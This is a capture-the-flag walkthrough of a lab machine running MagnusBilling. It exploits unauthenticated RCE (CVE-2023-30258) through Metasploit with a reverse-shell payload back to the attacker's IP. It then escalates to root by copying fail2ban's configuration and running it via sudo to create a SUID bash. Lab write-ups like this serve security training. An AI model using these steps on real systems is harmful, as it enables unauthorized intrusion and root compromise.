The following post by 0xb0b is licensed under CC BY 4.0
Recon
We start with a Nmap scan and find four open ports. Among them, we have a web server on port 80, a MariaDB service on port 3306 and an Astersik Call Manager on 5038.
From the default script scan, we can also see the content of robots.txt, which has a disallowed entry for the /mbilling directory.
We visit the directory and have a login page in front of us. Furthermore, we can see the name MagnusBilling in the title.
http://billing.thm/mbilling/
After a short search, we see that it seems like an open-source VoIP billing and management system for managing SIP trunks, VoIP calls, and customer billing. It provides tools for call routing, monitoring, and invoicing.
Shell As asterisk
This has an unauthenticated remote command execution vulnerability CVE-2023-30258, which is available as a manual exploit but is also present in the Metasploit framework.
We set up the exploit in the Metasploit framework and give it a try.
└─$ msfconsole
Metasploit tip: Use the analyze command to suggest runnable modules for
hosts
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v6.4.0-dev ]
+ -- --=[ 2405 exploits - 1239 auxiliary - 422 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search magnus
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 2023-06-26 excellent Yes MagnusBilling application unauthenticated Remote Command Execution.
1 \_ target: PHP . . . .
2 \_ target: Unix Command . . . .
3 \_ target: Linux Dropper . . . .
Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'
msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options
Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
tml
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /mbilling yes The MagnusBilling endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0
.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
When TARGET is 0:
Name Current Setting Required Description
---- --------------- -------- -----------
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated if left unset.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.14.90.235
LHOST => 10.14.90.235
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOST billing.thm
RHOST => billing.thm
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
We get a shell and are the user asterisk.
We set up another listener, and set up another reverse shell. Due to the fact that I am not so familiar with the Metasploit framework and would like to have an upgraded shell.
To upgrade the shell, we follow the instructions provided here:
We find another user, magnus in /etc/passwd. We have access to the home directory of the user and can read the user flag here.
Shell As root
As asterisk, we have the permission to execute sudo -l without password, and we are allowed to execute /usr/bin/fail2ban-client with root permissions.
Fail2ban is a security tool that monitors log files for suspicious activity and blocks IP addresses after repeated failed login attempts. It helps protect servers from brute-force attacks by automatically adding firewall rules.
The following resource provides various insights into how this could be used to extend your privileges.
There you can find an approach to customize a config in the config directory and place code in it that is to be executed with root permissions. Unfortunately, we only have read-only access to the directory...
/etc/fail2ban
... and its contents.
But we can remedy this. We can copy the configuration directory and refer to it when executing fail2ban.
In the fail2ban-client command, the -c option specifies the configuration directory for Fail2Ban.
sudo fail2ban-client -c /tmp/fail2ban/ -v restart
With rsync -av /etc/fail2ban/ /tmp/fail2ban/ we recursively copy the contents of /etc/fail2ban/ to /tmp/fail2ban/.
rsync -av /etc/fail2ban/ /tmp/fail2ban/
We can then follow the Exploiting Fail2Ban and Getting a Root Shell section from https://juggernaut-sec.com/fail2ban-lpe/ and customize action.d/iptables-multiport.conf and restart the service or write our own config.
With the following, we write our own config, which executes a script, which in turn copies /bin/bash to /tmp/bash and makes it a SUID binary to get a root shell.
After running the script we have a SUID binary at /tmp/bash and can execute it with the -p parameter to get a root shell. We then find the root flag at /root/root.txt.
